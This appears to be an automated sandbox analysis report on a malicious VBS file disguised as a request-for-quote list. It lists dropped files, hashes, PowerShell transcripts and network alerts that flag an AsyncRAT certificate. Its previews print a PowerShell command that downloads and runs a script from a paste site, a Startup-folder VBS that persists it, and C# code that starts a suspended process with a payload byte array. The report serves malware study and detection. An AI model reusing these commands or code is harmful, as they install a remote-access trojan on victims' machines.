Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.....&...........E... ...`....... ....................................@..................................D..W....`............................................................................... ............... ..H............text...$%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H.......(*...............................................................0............8.............................(....(....}....~.....r...p~....~..... ....~.........o1.......-.s....z..<(..........4X(...... .............. .....(.....3.~......{......o........-%s....z~......{......o........-.s....z...)......~......{.......X.....o).......-.s....z....3.~......{......o-...,.s....z....PX(..........TX(.........~......{........ .0...@o!.......-.s....z~......{...........o%.......-.s

C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	941
Entropy (8bit):	5.223369918239281
Encrypted:	false
SSDEEP:	24:KOuIdnUCZXathFEXb3at6KaM5DqBVKVrdFAMBJT44a:y0UCZKtbt6KxDcVKdBJc4a
MD5:	2AFA8A39A27D20C65D3D7BE409B88C5B
SHA1:	BB327D6676B22126720A52142D66CF23D114AFC2
SHA-256:	17568FC0C9A4E5B0BE645618E4C9C90B723CD07B3801BE7E913D1ACB3503D0C2
SHA-512:	030F7BB169003EE42D17AD67ED05EE537C81D61C0F5DA8025EF1099AD5C33C1C1AE009B66E1ADEC3A64493DF0C7B8A35C68DAB42514C263E0E91FA8E08D30677
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Management.dll" /R:"System.Windows.Forms.dll" /R:"mscorlib.dll" /R:"Microsoft.VisualBasic.dll" /out:"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll" /debug- /optimize+ /platform:X86 /unsafe /target:library "C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....warning CS1607: Assembly generation -- Referenced assembly 'mscorlib.dll' targets a different processor..

C:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0893251409333966
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygak7YnqqWPN5Dlq5J:+RI+ycuZhNuakSWPNnqX
MD5:	D05383B7C687FC28B8F4FC0C91B2E8A5
SHA1:	397A3851B5EC340A5E60610A0EEE1F0D10FEE9CC
SHA-256:	36EE338E7C0313F85F4EF34F8687C5349D850B5B3F20943E922CBD3AD453A3C9
SHA-512:	72EF0FAC394F69D6D44EC33C6EA1875C26F094DAD949ACE55BF9487804518EC91E298B587072F841906F923452B24768CEC42D3649E44217E753184E669BDC9D
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.a.r.m.4.5.u.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.a.r.m.4.5.u.e...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\RES14F3.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ce, 9 symbols
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	4.100108086923389
Encrypted:	false
SSDEEP:	24:Hri9CaMKAxZaHrolYhK0buVMONwI+ycuZhN8qakS3bPNnq92d:gMx0LolaKYu9m1ul9a3hq9G
MD5:	ECDE385ADBB15C9C3A63910E48364F25
SHA1:	BE2542FE33E8E84732BA6EEF2B3DE109CD335E1A
SHA-256:	C7455CEF351196818401F1E8E1FAF7FA9BA118AA70A3E87284EE0DC8FB1C54F7
SHA-512:	2A979C8DC5A80D2A3E31F1D9BB3F2130194E7B4926708CC6E51922C88212D318A907423FBB77251C15E6FFA67E4974BE47CA29AC9CAB0A2AC1BA2DB7935EDA49
Malicious:	false
Preview:	L......b.............debug$S............................@..B.rsrc$01........X.......t...........@..@.rsrc$02........P...~...............@..@........V....c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP.................r\...k./2.>..~............7.......C:\Users\user\AppData\Local\Temp\RES14F3.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.v.v.c.h.i.0.q...

C:\Users\user\AppData\Local\Temp\RESC9E1.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols
Category:	dropped
Size (bytes):	1340
Entropy (8bit):	3.9994034632031084
Encrypted:	false
SSDEEP:	24:HIK9oVat/SO0moyutbaHgYhKKjmNII+ycuZhNuakSWPNnq9ed:CIt/J5nRKMmu1ulua3qq9+
MD5:	6DF2142D3D29C6B02DA33122B71E2368
SHA1:	262370695120C64CE289E3E4A3DDAE10935DBA67
SHA-256:	47EC0D06A3398D519413A2BB248B88ECA2D8D4F0EB8E94DBD39A39532330C01E
SHA-512:	8201F9B42A5F705D415256F41F60F430665D9723A606C90982898E644E75E12579631BE70FAD9BFEA5DB36A5F67CEE597FEE427336A54D8F404CDF40C0127100
Malicious:	false
Preview:	L......b.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP.................S....(.................7.......C:\Users\user\AppData\Local\Temp\RESC9E1.tmp.-.<...................'...Microsoft (R) CVTRES.a.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.a.r.m.4.5.u.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1g4lgrl3.ws0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bbucvlc.1j2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c1efweqf.5aa.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrik5clw.pjd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mkzpdbdk.wsu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0t1u4d1.0tt.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.093049546370272
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqqak7Ynqq3bPN5Dlq5J:+RI+ycuZhN8qakS3bPNnqX
MD5:	725CE01FB76BB92F32123E13137EB885
SHA1:	B64C8B9241F74CB1E649A1759505F1D37ACA5B45
SHA-256:	B0BFFE5EF7081B7D4D41BFEB424EAEADA7B000965019B0D087B28D221D8B4627
SHA-512:	C33D8D527B869B474E202B8A813D9A5EF356F8742043079ECA83C18F17E942A1C60F1AA4023A2E5C584A526E6566791F9892EF86C7E4C5D6BF2D859EFA751559
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.v.v.c.h.i.0.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.v.v.c.h.i.0.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15102
Entropy (8bit):	4.763851296298132
Encrypted:	false
SSDEEP:	192:d4FazHgDRO2fwldsgNA/DxRry0at6knscDiF1u74+mFXqvFuI:+Fa9ldsgNeL1at6oslF1u2avN
MD5:	5B28648A4E188B0EBDF2D5EDCDA61624
SHA1:	FAF0BA6C2EF8D8184881EDA8A276796449969E1C
SHA-256:	E92ACAFC5A9DD128B120809AAF76178275C3D22B13FB7CC2F0D9C624BEFED1B1
SHA-512:	972FCA6205F8927363B751FF51C6CF07C3B42F7CBD8FBE12C1098DF539118ECF3D3CE1AF3B5D376C8710ED183786FC911279FF81941ABA4202A11CA5670B9937
Malicious:	true
Preview:	.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;..using System.Text;..using Microsoft.VisualBasic;..using System.Collections.Generic;....namespace GIT..{.. public sealed class Repository.. {.. public static void Execute(string path, byte[] payload).. {.. for (int i = 0; i < 5; i++).. {.. int readWrite = 0x0;.. NativeMethods.StartupInformation si = new NativeMethods.StartupInformation();.. NativeMethods.ProcessInformation pi = new NativeMethods.ProcessInformation();.. si.Size = (UInt32)(Marshal.SizeOf(typeof(NativeMethods.StartupInformation))); //Attention !.... try.. {.. bool createProc = NativeMethods.CreateProcessA(path, "", IntPtr.Zero, IntPtr.Zero, false, 0x00000004 \| 0x08000000, IntPtr.Zero, null, ref si, ref pi);.. if (!createProc).. {..

C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.119249747464875
Encrypted:	false
SSDEEP:	6:pAu+H2L/0DjuM3RLBPWdy1MZ915N723fkNMZx0zxspRu6EXbB/N723fkNMZDH:p37L/UukvGZ91baMNyGcY6EXbBlaMNyb
MD5:	06858D5DB4A5FE6410BA9B19940A70A6
SHA1:	F84DDECC4A87C4851BB0B22DC251887FE8D5BACE
SHA-256:	1F2487D01D1323D7E04B9D23E1CFC64C294705CFCE9A4AEA0E5DC2F17D8C4221
SHA-512:	C05EF81DEEE07FDF54D028E4C65680840BE4F9DB6A231505291E6850F5B34588831CCA5DE10379BC0F98FF1911FDA732DF49CE8B8DB719962BAF3090C0A1E2B8
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"System.Management.dll" /R:"System.Windows.Forms.dll" /R:"mscorlib.dll" /R:"Microsoft.VisualBasic.dll" /out:"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll" /debug- /optimize+ /platform:X86 /unsafe /target:library "C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.0.cs"

C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.023016144578243
Encrypted:	false
SSDEEP:	192:krwrEuvXuse9L9kJfpesGCFoOQejfv0Lavl3WXDGgx:keVesgL9OfYDCKejH0Li3vgx
MD5:	697745438041AE8BBAAC6AEE5CA9B839
SHA1:	52B1726BF56C630693188DA5F8AE23854C43037B
SHA-256:	B7167470565733108E4C939E862F97A32F227D436205591F183517BB352BF646
SHA-512:	72DFD42CD2ED29CD392B0865FFE2FC94ADB009415E054C6378E5338F6AE438DEF236D625348E645E16928DE4F991CD90C89307C699C54398F473E6C207B48103
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.....&...........E... ...`....... ....................................@..................................D..W....`............................................................................... ............... ..H............text...$%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H.......(*...............................................................0............8.............................(....(....}....~.....r...p~....~..... ....~.........o1.......-.s....z..<(..........4X(...... .............. .....(.....3.~......{......o........-%s....z~......{......o........-.s....z...)......~......{.......X.....o).......-.s....z....3.~......{......o-...,.s....z....PX(..........TX(.........~......{........ .0...@o!.......-.s....z~......{...........o%.......-.s

C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
Category:	modified
Size (bytes):	995
Entropy (8bit):	5.243668380083427
Encrypted:	false
SSDEEP:	24:KObuVMyIdnUCZXaMknEXb3aMkDOKaM5DqBVKVrdFAMBJT44a:fuR0UCZKMkMkOKxDcVKdBJc4a
MD5:	92D68A93FBD01D2D5DABB45CBB2BCC97
SHA1:	105C621A2CAD71603095BE3E41A552202CDE1D24
SHA-256:	7F076E2ED5C3DE4D0EF68D4D227D3D845FF3C82AED6C177A09DFFE99A25D7DC0
SHA-512:	5A8056005CFD1CB6C6C87BA65CE073151F636A47C979C07A67E5C97C2E7B3364461ABFD157E0B96BA94A94878D63414ED02A460F3BE38B7977FA96E78DD64825
Malicious:	false
Preview:	.C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Management.dll" /R:"System.Windows.Forms.dll" /R:"mscorlib.dll" /R:"Microsoft.VisualBasic.dll" /out:"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll" /debug- /optimize+ /platform:X86 /unsafe /target:library "C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....warning CS1607: Assembly generation -- Referenced assembly 'mscorlib.dll' targets a different processor..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	136
Entropy (8bit):	5.092976524862006
Encrypted:	false
SSDEEP:	3:jTF+m8nhWegSXnGQqPJH0wxMCLkFFCFKwOaHF5CmE3q1rh:jTdqhWeGQO0wKjFlaHS+rh
MD5:	EA566D4E85B14D4B5D1AE1DC2F76622F
SHA1:	9A8CB117545D8951466C5F645E12714F8BE4B2A2
SHA-256:	E7EBAAA98319F268F9079B57495C49947A05CB5C71A37FA1E34900C888523E5B
SHA-512:	4B1E025EE3803A8DFD1B4AA3183BFFBF45F0F70A59B2547CE2B0054DAD93B3B1024DDFE01C7B453EDB990A0A8556DCEBFDE19AA412B5041D16170F2C2A65C408
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	Set Obj = CreateObject("WScript.Shell")..Obj.Run "PowerShell -ExecutionPolicy RemoteSigned -File " & "C:\Users\Public\gia9ab2dg0.PS1", 0

C:\Users\user\Documents\20220516\PowerShell_transcript.841618.MEqVT+yD.20220516192930.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	2427
Entropy (8bit):	5.476345661251233
Encrypted:	false
SSDEEP:	48:BZ0KvTL8oOS61jizE1rZ1KJaqDYB1ZK461jizE1rZ1KsZZH:BZ0WTL8N72zauoqDo1ZKB2zausZV
MD5:	94146906D1D0B30F384BC9BDB5EAED3C
SHA1:	DE9A6BE3CC1B063615123095007AB4078649B864
SHA-256:	8715CA2A8BC786C7C71DDFABC62BE0C393637F307355FA1AD3E1AEBF82258F64
SHA-512:	D233293784894028F8B4C9CD4D952FD8C139A5C51CC7C1159D1157F2C08D51FC6D716967B47A3BE274B7A85A84C1B2723856E4CACC0B4F95BC29C646AACB3754
Malicious:	false
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20220516192931..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Read

C:\Users\user\Documents\20220516\PowerShell_transcript.841618.RBBMNgBb.20220516193001.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1043
Entropy (8bit):	5.116593236701985
Encrypted:	false
SSDEEP:	24:BxSAQ7vBVL8x2DOXUW1bSWYyHjeTKKjX4CIym1ZJXwOigvgnxSAZq:BZUvTL8oOJlxqDYB1ZqOiXZZq
MD5:	744959ADC6EF14E3E878693258CBFC87
SHA1:	8B5628780C97BE3FA18942A482409C24E06DB32C
SHA-256:	02CF9F4F16428F8727CDB090FAE0D69A25E0FA9D332F57E3D80ED5554D183D1F
SHA-512:	0FE208B0BE00D28A164F953AA427160640AC2B4F590627441ECF242193C016EE76DB40A36E8E1093D2E171FC252840B9002FEE204FDCD858F750D8DB3B0E1E12
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220516193003..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1..Process ID: 7116..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220516193003..******************..PS>CommandInvocation(gia9ab2dg0.PS1): "gia9ab2dg0.PS1"..0..1..2..3..4..******************..Command start time: 20220516194023..******************..PS>$global:?..True..********************..Windows PowerShell transcript end..End tim

C:\Users\user\Documents\20220516\PowerShell_transcript.841618.f5mU45le.20220516192941.txt

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.124152018765392
Encrypted:	false
SSDEEP:	24:BxSA047vBVL8x2DOXUW1bSWHHjeTKKjX4CIym1ZJXcwOigv0nxSAZK:BZ0svTL8oOJlHqDYB1ZKwOiTZZK
MD5:	187B7ED50370CBDDCBEF263BB3C21DE1
SHA1:	21F6021B58B1BA9EF1821002F8A3B980DF230A77
SHA-256:	428616C73D1526A9890E94D2D16552142DB37D15597B55488273575302251BD8
SHA-512:	E02DEFE89823E27C6B298ACBA1D10E76939D58D969363C67EAECF8FCA4A9651C0942700139496214CE1BF4FB82C912001071CD8B1195AE2EB139E10894BE3998
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220516192942..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1..Process ID: 924..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220516192942..******************..PS>CommandInvocation(gia9ab2dg0.PS1): "gia9ab2dg0.PS1"..0..1..2..3..4..******************..Command start time: 20220516193800..******************..PS>$global:?..True..********************..Windows PowerShell transcript end..End time

Static File Info

General

File type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Entropy (8bit):	4.5450742907160055
TrID:
File name:	Re-RFQ - PN List.vbs
File size:	43700
MD5:	867aa07dd614380e5943bccd70fee675
SHA1:	b97d664bc1f9f8f3ba2819f17154e4d32618734c
SHA256:	35d11d86e996833469ee713fce6ba52dbcdcf3211e36985182f47040c2166ac9
SHA512:	51aa62bb0d8d7bcf379a87152f65722cb3d00662bac7cb1389fff0a326164817e67aed4f3990459497390fd9092efa4af70cde12f1c3c1b7bf5bc014a8b63abd
SSDEEP:	192:YQOyzLyFyT/COPgoiyhPj/2PjSc0XyoG6B0uKGP/ciIQuNEYMhH:PzesT/CQiE/sMGyJYNEnhH
TLSH:	9F13B750D9E237AEF08CDDFA985EC42BC2C454E1FED74EAC885DAE7198116B49B4804F
File Content Preview:	'%S0}1_YJ,;_3R,%?1X$3-B0/>UNPH4W=O(K!O{X%0:T<X~:9A6HO/QAM8X7JB3$;=DO4UNYR1FG>9+RH^-&302KZ$-6Y6:@6)F#H-0YL<S{#Q3</=TU^=T<7+1VD!0:;Q9#1C)DBRQG)A@C4(<^R+:=+GX1FV#6VBX(+5+D5R$7D/+S@?6TZ#^,XZ{(&++(^>M{,+LAP1_:T##\|_)ACV{FC*FT,+TDHG,G#;%HKLF)%+\|L

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
91.193.75.216192.168.2.69217497592848152 05/16/22-19:30:11.449233	TCP	2848152	ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant)	9217	49759	91.193.75.216	192.168.2.6
91.193.75.216192.168.2.69217497592034847 05/16/22-19:30:11.449233	TCP	2034847	ET TROJAN Observed Malicious SSL Cert (AsyncRAT)	9217	49759	91.193.75.216	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 16, 2022 19:29:25.583755016 CEST	49732	1433	192.168.2.6	199.102.48.248
May 16, 2022 19:29:25.749480963 CEST	1433	49732	199.102.48.248	192.168.2.6
